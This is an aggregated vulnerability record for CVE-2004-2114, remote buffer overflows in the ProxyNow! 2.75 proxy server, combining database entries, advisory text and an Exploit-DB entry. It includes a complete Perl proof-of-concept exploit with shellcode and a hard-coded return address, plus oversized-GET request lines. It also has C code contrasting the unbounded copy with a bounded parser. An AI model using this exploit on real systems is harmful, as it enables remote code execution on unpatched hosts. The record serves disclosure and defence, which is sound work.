CVE-2004-2114
CVSS 10.0
Published: 2004-12-31 00:00:00
Revised: 2016-10-17 23:06:28

[Original] Stack-based and heap-based buffer overflows in ProxyNow! 2.75 and earlier allow remote attackers to execute arbitrary code via a GET request with a long ftp:// URL.


[CNNVD] InternetNow ProxyNow stack-based buffer overflow vulnerability (CNNVD-200412-754)

        
        ProxyNow! is a system that lets several computers share one Internet connection.
        ProxyNow! does not adequately bounds-check HTTP GET requests. A remote attacker can exploit this to cause a buffer overflow, and carefully crafted request data can execute arbitrary instructions on the system with the privileges of the ProxyNow! process.
        Submitting an HTTP GET request containing an overlong string prefixed with 'ftp://' to TCP port 3128, the port the server listens on, triggers a heap-based buffer overflow. In addition, because a 'wsprintfA' call does not bounds-check its input, submitting an overlong GET request directly can also trigger a stack-based overflow; carefully crafted data can likewise execute arbitrary instructions with the privileges of the process.
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:internetnow:proxynow:2.75
cpe:/a:internetnow:proxynow:2.6

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2114
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2114
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-754
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=107515550931508&w=2
(UNKNOWN)  BUGTRAQ  20040126 ProxyNow! 2.x Multiple Overflow Vulnerabilities
http://www.securityfocus.com/bid/9500
(UNKNOWN)  BID  9500
http://xforce.iss.net/xforce/xfdb/14955
(UNKNOWN)  XF  proxynow-get-bo(14955)

- Vulnerability information

InternetNow ProxyNow stack-based buffer overflow vulnerability
Critical  Boundary condition error
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        Vendor patches:
        InternetNow
        -----------
        The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:
        
        http://www.internetnow.com.my/

- Vulnerability information (23608)

InternetNow ProxyNow 2.6/2.75 Multiple Stack and Heap Overflow Vulnerabilities (EDBID:23608)
windows remote
2004-01-26 Verified
0 Peter Winter-Smith
N/A
source: http://www.securityfocus.com/bid/9500/info

ProxyNow has been reported to be prone to multiple overflow vulnerabilities that may allow an attacker to execute arbitrary code in order to gain unauthorized access to a vulnerable system. The vulnerabilities present themselves when an attacker sends an HTTP GET request containing an excessively long URI to the server on TCP port 3128. The URI must be prefixed with the string 'ftp://'.

ProxyNow versions 2.75 and prior have been reported to be prone to these issues. 

#########################################################################
#!/usr/bin/perl -w
#
# Remote Stack Overflow in ProxyNow! 2.x PoC Exploit
#
# Tested on Windows XP Home SP1
#
# Ever seen notepad.exe with SYSTEM privileges? :-/
#
#  - by Peter Winter-Smith [peter4020@hotmail.com]

use strict;
use IO::Socket;

# Usage: proxynow.pl <victim> [port]. The port falls back to 3128, the
# port ProxyNow! listens on, when it is not given.
if (!$ARGV[0]) {
    print "Usage: proxynow.pl <victim> <port>\n" .
          "\tDefault port is 3128\n\n";
    exit;
}
my $host = $ARGV[0];
my $port = $ARGV[1] || 3128;

print "Remote Stack Overflow in ProxyNow! PoC - Executes notepad.exe\n" .
      "Notepad.exe will only be visible from the Task Manager!\n\n";

my $victim = IO::Socket::INET->new(Proto    => 'tcp',
                                   PeerAddr => $host,
                                   PeerPort => $port)
    or die "Unable to connect to $host on port $port: $!";

# Small NOP sled placed directly after the overwritten return address.
my $nops = "\x90\x90\x90\x90";

# Stub reached via the return address: mov eax,esp / add eax,-0xFD / jmp eax.
# It jumps 253 bytes back down the stack into the NOP sled in front of the
# shellcode, so the exact stack address of the shellcode need not be known.
my $subcode = "\x89\xE0\x05\x03\xFF\xFF\xFF\xFF" .
              "\xE0";

# Shellcode: builds the string "notepad" on the stack, pushes a pointer to it,
# calls the hard-coded address 0x77C28044 (valid only on the Windows XP SP1
# build this was tested on) and then traps with int3.
my $shellcode = "\x31\xC9\x51\x68\x65\x70\x61\x64" .
                "\x68\xFF\x6E\x6F\x74\x8D\x44\x24" .
                "\x01\x50\xB8\x44\x80\xC2\x77\xFF" .
                "\xD0\xCC";

my $pad = "XXXXXXXX";

# Saved EBP is overwritten with filler; the saved return address becomes
# 0x1001583B (little-endian), a fixed address in the tested build that
# must land execution in $nops/$subcode for the stub to run.
my $ebp = "BBBB";
my $eip = "\x3B\x58\x01\x10";

# Request layout: ftp:// URL, NOP sled, shellcode, filler up to the saved
# frame, EBP/EIP, sled, stub and padding, terminated as an HTTP/1.1 request.
my $bad = "GET ftp://www.nosite.com/" . "\x90"x33 . $shellcode . "a"x190 .
          $ebp . $eip . $nops . $subcode . $pad . "\x20HTTP/1.1\r\n\r\n";

print $victim $bad;

print "[+] Data sent: Check for notepad.exe running as SYSTEM!\n";

sleep(2);

close($victim);

print "[+] Done!\n";
exit;
#########################################################################


		

- Vulnerability information

3723
ProxyNow! HTTP Request Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-01-27 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

InternetNow ProxyNow Multiple Stack and Heap Overflow Vulnerabilities
Boundary Condition Error 9500
Yes No
2004-01-26 12:00:00 2009-07-12 02:06:00
The disclosure of these issues has been credited to Peter Winter-Smith <peter4020@hotmail.com>.

- Affected program versions

InternetNow ProxyNow 2.75
InternetNow ProxyNow 2.6

- Vulnerability discussion

ProxyNow has been reported to be prone to multiple overflow vulnerabilities that may allow an attacker to execute arbitrary code in order to gain unauthorized access to a vulnerable system. The vulnerabilities present themselves when an attacker sends an HTTP GET request containing an excessively long URI to the server on TCP port 3128. The URI must be prefixed with the string 'ftp://'.

ProxyNow versions 2.75 and prior have been reported to be prone to these issues.

- Exploit

The following proof of concept has been provided:
GET ftp://('a'x647)('AAAA')('XXXX') HTTP/1.1
GET ('ftp://www.example.com/')('a'x249)('BBBB')('XXXX') HTTP/1.1
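As an added illustration that is not ProxyNow's own code (its sources were never published), the C below models the bug class the advisory describes: an attacker-controlled URI formatted into a fixed stack buffer by an unbounded call (wsprintfA on Windows, sprintf as the portable stand-in here), placed beside a bounded request-line parser that rejects both proof-of-concept shapes listed above before anything is copied. The buffer sizes, the request builder and the sprintf substitution are assumptions; the two request lines are constructed from the counts in the record, not captured traffic.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Assumed sizes: ProxyNow's real buffer sizes are unknown, so these are
 * illustrative values chosen so the proof-of-concept URIs exceed them. */
#define METHOD_MAX   7
#define URI_MAX      255
#define VERSION_MAX  15

struct request_line {
    char method[METHOD_MAX + 1];
    char uri[URI_MAX + 1];
    char version[VERSION_MAX + 1];
};

/* The 'before': the pattern the advisory attributes to wsprintfA, an
 * attacker-controlled string formatted into a fixed buffer with no bound.
 * Kept only for comparison; it must never see untrusted input. */
void format_uri_unbounded(char *dst, const char *uri)
{
    sprintf(dst, "%s", uri);   /* no limit on the %s argument */
}

/* Copy one whitespace-delimited token into dst with a hard bound.
 * Returns bytes consumed, or -1 if the token is empty or does not fit. */
static int copy_token(char *dst, size_t dstlen, const char *src)
{
    size_t n = 0;
    while (src[n] != '\0' && src[n] != ' ' && src[n] != '\r' && src[n] != '\n')
        n++;
    if (n == 0 || n >= dstlen)
        return -1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return (int)n;
}

/* Hardened request-line parser: every token is length-checked before it is
 * copied, so an oversized URI is refused with -1 instead of overrunning
 * out->uri.  Returns 0 on success, -1 on an oversized or malformed line. */
int parse_request_line(const char *line, struct request_line *out)
{
    const char *p = line;
    int n;

    if ((n = copy_token(out->method, sizeof out->method, p)) < 0) return -1;
    p += n;
    if (*p++ != ' ') return -1;

    if ((n = copy_token(out->uri, sizeof out->uri, p)) < 0) return -1;
    p += n;
    if (*p++ != ' ') return -1;

    if ((n = copy_token(out->version, sizeof out->version, p)) < 0) return -1;
    p += n;

    /* Only CRLF (or end of string) may follow the version token. */
    if (*p != '\0' && strcmp(p, "\r\n") != 0) return -1;
    return 0;
}

/* Constructed reproduction of the two proof-of-concept request lines:
 *   1: GET ftp://('a'x647)('AAAA')('XXXX') HTTP/1.1
 *   2: GET ('ftp://www.example.com/')('a'x249)('BBBB')('XXXX') HTTP/1.1
 * Returns the length written, or -1 if out is too small. */
int build_poc_request(int variant, char *out, size_t outlen)
{
    const char *prefix = variant == 1 ? "ftp://" : "ftp://www.example.com/";
    const char *tail   = variant == 1 ? "AAAAXXXX" : "BBBBXXXX";
    size_t filler      = variant == 1 ? 647 : 249;
    size_t need = 4 + strlen(prefix) + filler + strlen(tail) + 11 + 1;
    char *p = out;

    if (outlen < need)
        return -1;
    p += sprintf(p, "GET %s", prefix);
    memset(p, 'a', filler);
    p += filler;
    p += sprintf(p, "%s HTTP/1.1\r\n", tail);
    return (int)(p - out);
}

int main(void)
{
    char req[1024];
    struct request_line rl;

    if (parse_request_line("GET ftp://www.example.com/ HTTP/1.1\r\n", &rl) == 0)
        printf("benign request accepted, uri=%s\n", rl.uri);

    /* Both proof-of-concept shapes are refused before any copy happens. */
    for (int v = 1; v <= 2; v++) {
        int len = build_poc_request(v, req, sizeof req);
        printf("variant %d: %d bytes, parse=%d\n", v, len,
               parse_request_line(req, &rl));
    }
    return 0;
}
```

The check that matters is the `n >= dstlen` comparison in copy_token: it is made on the source length before any byte is written, which is exactly what the unbounded formatting call omitted. The same rejection is what a proxy in front of ProxyNow, or a signature on port 3128 keyed on a GET whose URI starts with ftp:// and exceeds a few hundred bytes, would enforce.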

The following exploit has been provided for the stack based buffer overflow issue:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- References
